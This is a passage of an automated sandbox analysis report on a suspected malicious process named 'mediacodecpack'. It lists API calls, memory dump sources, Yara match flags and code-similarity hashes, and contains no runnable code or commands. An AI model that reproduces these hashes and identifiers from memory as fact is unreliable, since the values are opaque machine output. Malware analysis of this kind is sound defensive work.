                                                                                            • htons.WS2_32(?), ref: 02D43DD4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: htonlhtons$H_prologstd::bad_exception::bad_exception
                                                                                            • String ID:
                                                                                            • API String ID: 3882411702-0
                                                                                            • Opcode ID: 3c28ccb71ec2558073b4a88d1927562040918ff5acde0d283604eece81edfcbc
                                                                                            • Instruction ID: 1ceb90f0be7918d3fa07c32ce0d8d8efdd0199d97ca7839e6de1d0472ebb69e5
                                                                                            • Opcode Fuzzy Hash: 3c28ccb71ec2558073b4a88d1927562040918ff5acde0d283604eece81edfcbc
                                                                                            • Instruction Fuzzy Hash: 21117035900308EBDF019F68E889A5AB7B9EF08310F108456FC05DF341DB759E54CBA1
                                                                                            APIs
                                                                                            • sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 609034D8
                                                                                            • sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903521
                                                                                            • sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 6090354A
                                                                                            • sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903563
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                            • String ID:
                                                                                            • API String ID: 1477753154-0
                                                                                            • Opcode ID: cc0b0c4414a91b2c8747a1fff16426ed14613a144e31e5ae299e51467139190c
                                                                                            • Instruction ID: 848dca46e936c6e01d33e08870ae11aa620bd8b24bdb606da7ea596206f2e213
                                                                                            • Opcode Fuzzy Hash: cc0b0c4414a91b2c8747a1fff16426ed14613a144e31e5ae299e51467139190c
                                                                                            • Instruction Fuzzy Hash: 44111F726186218FDB00EF7DC8817597FEAFB66308F00842DE865E7362E779D8819741
                                                                                            APIs
                                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000), ref: 02D423D0
                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02D423DE
                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02D42401
                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02D42408
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                                            • String ID:
                                                                                            • API String ID: 4018804020-0
                                                                                            • Opcode ID: 4ef5240a38ef013cd8efb939bd6c71418d05be6c698b072df632586fc1aedc0d
                                                                                            • Instruction ID: a92b2135815a591dcece3481568ce76d8c0f01386208dad660fd5b609ddc4fa4
                                                                                            • Opcode Fuzzy Hash: 4ef5240a38ef013cd8efb939bd6c71418d05be6c698b072df632586fc1aedc0d
                                                                                            • Instruction Fuzzy Hash: 9D118E72600305ABDB109F61E888B67BBB8FF55709F50446DF9419B240DBB1FD95CBA0
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                            • String ID:
                                                                                            • API String ID: 3016257755-0
                                                                                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                            • Instruction ID: ae4826b19765375264388218f22e31b7369d6f563456c6d946141630e23fb365
                                                                                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                            • Instruction Fuzzy Hash: 9401393200016ABBCF126E84CC01CEE3F72BB19394F588615FE6959231C376C9B5EB91
                                                                                            APIs
                                                                                            • sqlite3_initialize.SQLITE3 ref: 6092A450
                                                                                              • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 6092A466
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 6092A47F
                                                                                            • sqlite3_memory_used.SQLITE3 ref: 6092A4BA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_mutex_enter$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_leave
                                                                                            • String ID:
                                                                                            • API String ID: 2673540737-0
                                                                                            • Opcode ID: 58333c90df1895ca2798dafcbab41657529afc007f85020e925d8580cfdcdfcb
                                                                                            • Instruction ID: c4988029ba64cfb2248a7cf0c790324acf4c13eb0f9cd3f15fdedc175ef3c91a
                                                                                            • Opcode Fuzzy Hash: 58333c90df1895ca2798dafcbab41657529afc007f85020e925d8580cfdcdfcb
                                                                                            • Instruction Fuzzy Hash: F9019276E143148BCB00EF79D88561ABFE7FBA5324F008528EC9497364E735DC408B81
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_value_text$sqlite3_freesqlite3_load_extension
                                                                                            • String ID:
                                                                                            • API String ID: 3526213481-0
                                                                                            • Opcode ID: e69664dddad2286ff6ed0cb1f1c7a121e5262b7aa8061cf10291ac83704fea4b
                                                                                            • Instruction ID: 98199466554994e62e20ad809be6129e3c08b78dd6d8c38fc18f61524e73aad2
                                                                                            • Opcode Fuzzy Hash: e69664dddad2286ff6ed0cb1f1c7a121e5262b7aa8061cf10291ac83704fea4b
                                                                                            • Instruction Fuzzy Hash: 4101E9B5A043059BCB00EF69D485AAFBBF5EF68654F10C529EC9497304E774D841CF91
                                                                                            APIs
                                                                                            • sqlite3_prepare.SQLITE3 ref: 60969166
                                                                                            • sqlite3_errmsg.SQLITE3 ref: 60969172
                                                                                              • Part of subcall function 609258A8: sqlite3_log.SQLITE3 ref: 609258E5
                                                                                            • sqlite3_errcode.SQLITE3 ref: 6096918A
                                                                                              • Part of subcall function 609251AA: sqlite3_log.SQLITE3 ref: 609251E8
                                                                                            • sqlite3_step.SQLITE3 ref: 60969197
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_log$sqlite3_errcodesqlite3_errmsgsqlite3_preparesqlite3_step
                                                                                            • String ID:
                                                                                            • API String ID: 2877408194-0
                                                                                            • Opcode ID: 06185e76a961c89383dca1620ea17d5683e825aa4cba78efc797247d66345ea8
                                                                                            • Instruction ID: d4ebd4c9a05a553e526e78eaaf80584f3afcfe73b3175c4c6dada352db343273
                                                                                            • Opcode Fuzzy Hash: 06185e76a961c89383dca1620ea17d5683e825aa4cba78efc797247d66345ea8
                                                                                            • Instruction Fuzzy Hash: 9F0186B091C3059BE700EF29C88525DFBE9EFA5314F11892DA89987384E734C940CB86
                                                                                            APIs
                                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02D424A9
                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02D424B8
                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02D424CD
                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02D424D4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                                            • String ID:
                                                                                            • API String ID: 4018804020-0
                                                                                            • Opcode ID: ac74b04732440d5d6134f958047dc0052fc5755a50a55ee04603a4d9411c6e11
                                                                                            • Instruction ID: 6a8cde73c1370b1f7332d87a13dbdcdeceaf377f50520960cf443d1b01e5b8c6
                                                                                            • Opcode Fuzzy Hash: ac74b04732440d5d6134f958047dc0052fc5755a50a55ee04603a4d9411c6e11
                                                                                            • Instruction Fuzzy Hash: FFF03C72540205AFDB009FA5E848F9ABBACFF59711F508429FA09C6241D771E9A0CFE0
                                                                                            APIs
                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 609084E9
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 60908518
                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 60908528
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 6090855B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                            • String ID:
                                                                                            • API String ID: 1477753154-0
                                                                                            • Opcode ID: dbb0a767127359d75753d9f151f7b9e03affe710ab86404e29d94d971225fba8
                                                                                            • Instruction ID: c41a4d3f3efa942db11cbd34a9101edfe28f26dd6f673ba1da0d5803e4a0adbd
                                                                                            • Opcode Fuzzy Hash: dbb0a767127359d75753d9f151f7b9e03affe710ab86404e29d94d971225fba8
                                                                                            • Instruction Fuzzy Hash: FD01A4B05093048BDB40AF25C5D97CABBA5EF15718F0884BDEC894F34AD7B9D5448BA1
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02D42009
                                                                                            • RtlDeleteCriticalSection.NTDLL(?), ref: 02D42028
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02D42037
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02D4204E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseHandle$CriticalDeleteH_prologSection
                                                                                            • String ID:
                                                                                            • API String ID: 2456309408-0
                                                                                            • Opcode ID: dc31d449d22bf8187fc435758a07a9b2aaf08250b623c4d8d951b92756a15202
                                                                                            • Instruction ID: 80626a450b89bfa9613763aaa1673075fe1bb93e3c03789dbe221ce8716c6a27
                                                                                            • Opcode Fuzzy Hash: dc31d449d22bf8187fc435758a07a9b2aaf08250b623c4d8d951b92756a15202
                                                                                            • Instruction Fuzzy Hash: E30181714007149BC734AF54E81C7AABBF5FF04709F10495EE84692B90DB75AD94CFA4
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Event$H_prologSleep
                                                                                            • String ID:
                                                                                            • API String ID: 1765829285-0
                                                                                            • Opcode ID: c2f36b5f7284eb598b5e07881fdccb31646d32187351291ad195421439489430
                                                                                            • Instruction ID: 8b472f6ac22f69f5fb5e4f06f54cb94952e62f2260410fb4afd387fbe6fee112
                                                                                            • Opcode Fuzzy Hash: c2f36b5f7284eb598b5e07881fdccb31646d32187351291ad195421439489430
                                                                                            • Instruction Fuzzy Hash: 8EF03A36A40110EFCB009F94E88DB98BBA4FF09321F5485A9F90ADB391C7759D54CBA1
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_log
                                                                                            • String ID: into$out of
                                                                                            • API String ID: 632333372-1114767565
                                                                                            • Opcode ID: 05e60a680804dc8d75cc30d301a58b6784d3cbcabfb13c7dcba40214300a3b29
                                                                                            • Instruction ID: de20b162988cb891a2f8fbcf22309076e3e21d241eadb06c465d82de9f0e8d92
                                                                                            • Opcode Fuzzy Hash: 05e60a680804dc8d75cc30d301a58b6784d3cbcabfb13c7dcba40214300a3b29
                                                                                            • Instruction Fuzzy Hash: 91910170A043149BDB26CF28C88175EBBBABF65308F0481E9E858AB355D7B5DE85CF41
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prolog_memmove
                                                                                            • String ID: &'
                                                                                            • API String ID: 3529519853-655172784
                                                                                            • Opcode ID: 2b171a11e228c7284b1b4613d5c1d11d5888aefc59bd761a981f18de77202c1b
                                                                                            • Instruction ID: 82cd2b241e2af457c67aaee6d009c928f718529da3493fb7732be301641d105d
                                                                                            • Opcode Fuzzy Hash: 2b171a11e228c7284b1b4613d5c1d11d5888aefc59bd761a981f18de77202c1b
                                                                                            • Instruction Fuzzy Hash: 74615A71D002199FDF20DFA5C955AEEBBB6EF48310F10816AD819AB290DB70AE45CF61
                                                                                            APIs
                                                                                              • Part of subcall function 60918408: sqlite3_value_text.SQLITE3 ref: 60918426
                                                                                            • sqlite3_free.SQLITE3 ref: 609193A3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_freesqlite3_value_text
                                                                                            • String ID: (NULL)$NULL
                                                                                            • API String ID: 2175239460-873412390
                                                                                            • Opcode ID: 2d639d8f8789be8f4f2115c7e339461789bfa1512606a4b94e85873a15b94a2d
                                                                                            • Instruction ID: 63658e955800b40111a930d2026d12727b3b294c4be858d68b3f7c51d7abf176
                                                                                            • Opcode Fuzzy Hash: 2d639d8f8789be8f4f2115c7e339461789bfa1512606a4b94e85873a15b94a2d
                                                                                            • Instruction Fuzzy Hash: E3514B31F0825A8EEB258A68C89479DBBB6BF66304F1441E9C4A9AB241D7309DC6CF01
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_log
                                                                                            • String ID: -- $d
                                                                                            • API String ID: 632333372-777087308
                                                                                            • Opcode ID: 2197877c990d2cc598be623123ad695ba2ed3a88a0fc98749b4c643aad0a3996
                                                                                            • Instruction ID: d45f625f7ed72e8bd0cbe86fb5af212c953cff4c7e5ffbb26f6c4a79540968e1
                                                                                            • Opcode Fuzzy Hash: 2197877c990d2cc598be623123ad695ba2ed3a88a0fc98749b4c643aad0a3996
                                                                                            • Instruction Fuzzy Hash: FB51F674A043689BDB26CF28C980789BBFABF55304F1481D9E89CAB341C7759E85CF40
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_log
                                                                                            • String ID: string or blob too big$|
                                                                                            • API String ID: 632333372-330586046
                                                                                            • Opcode ID: b6301cf988e6664baaa8b4960c9a349f418ad1f33ca54faa928bbeacb0d503e6
                                                                                            • Instruction ID: 65a9847582dc10a4f4f17f1c4fc8d82f10366072c52f03016cacc5a11d353e3e
                                                                                            • Opcode Fuzzy Hash: b6301cf988e6664baaa8b4960c9a349f418ad1f33ca54faa928bbeacb0d503e6
                                                                                            • Instruction Fuzzy Hash: 4D51B9749083689BCB22CF28C985789BBF6BF59314F1086D9E49897351C775EE81CF41
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_logsqlite3_value_text
                                                                                            • String ID: string or blob too big
                                                                                            • API String ID: 2320820228-2803948771
                                                                                            • Opcode ID: 4552165c49a92a3f1eebbde7746405f837ee0ef0562a3825501d2540ddfe4a5c
                                                                                            • Instruction ID: 1f8da1134a73d261049fdcd83983d84c916c8a3f87851362e697cdb17b1d2bab
                                                                                            • Opcode Fuzzy Hash: 4552165c49a92a3f1eebbde7746405f837ee0ef0562a3825501d2540ddfe4a5c
                                                                                            • Instruction Fuzzy Hash: F631D9B0A083249BCB25DF28C881799B7FABF69304F0085DAE898A7301D775DE81CF45
                                                                                            APIs
                                                                                            • WSASetLastError.WS2_32(00000000,?,?,?,?,?,?,?,02D473D7,?,?,00000000), ref: 02D486D4
                                                                                            • getsockname.WS2_32(?,?,?), ref: 02D486EA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLastgetsockname
                                                                                            • String ID: &'
                                                                                            • API String ID: 566540725-655172784
                                                                                            • Opcode ID: f9668775c982a01a25f742ecad6894cfc92bb7a01107e162df9a6476cb35ed72
                                                                                            • Instruction ID: da14f900b8c2db5bfe2966fa68bde722fa01855fd7bff4e5b59902f3e6e26be4
                                                                                            • Opcode Fuzzy Hash: f9668775c982a01a25f742ecad6894cfc92bb7a01107e162df9a6476cb35ed72
                                                                                            • Instruction Fuzzy Hash: CF218176A002489FDB10DF68D854ACEB7F5FF49364F11816AE818EB380DB34ED458B60
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02D4BCB8
                                                                                              • Part of subcall function 02D4C294: std::exception::exception.LIBCMT ref: 02D4C2C3
                                                                                              • Part of subcall function 02D4CA4A: __EH_prolog.LIBCMT ref: 02D4CA4F
                                                                                              • Part of subcall function 02D527C5: _malloc.LIBCMT ref: 02D527DD
                                                                                              • Part of subcall function 02D4C2F3: __EH_prolog.LIBCMT ref: 02D4C2F8
                                                                                            Strings
                                                                                            • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 02D4BCEE
                                                                                            • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02D4BCF5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prolog$_mallocstd::exception::exception
                                                                                            • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
                                                                                            • API String ID: 1953324306-1943798000
                                                                                            • Opcode ID: 06f4bdf46651ea0d105d934e4fa4f05b5e486db80266b73ddc06ae262c9fa161
                                                                                            • Instruction ID: 028d3e28685c5892442f1675762daa81f094796f71959442d7c598f607799af3
                                                                                            • Opcode Fuzzy Hash: 06f4bdf46651ea0d105d934e4fa4f05b5e486db80266b73ddc06ae262c9fa161
                                                                                            • Instruction Fuzzy Hash: 2C216D71E012589BDB14EBE8E4586AEBBB5EF24704F04449EEC06B7380DF745E04CBA1
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02D4BDAD
                                                                                              • Part of subcall function 02D4C36B: std::exception::exception.LIBCMT ref: 02D4C398
                                                                                              • Part of subcall function 02D4CB81: __EH_prolog.LIBCMT ref: 02D4CB86
                                                                                              • Part of subcall function 02D527C5: _malloc.LIBCMT ref: 02D527DD
                                                                                              • Part of subcall function 02D4C3C8: __EH_prolog.LIBCMT ref: 02D4C3CD
                                                                                            Strings
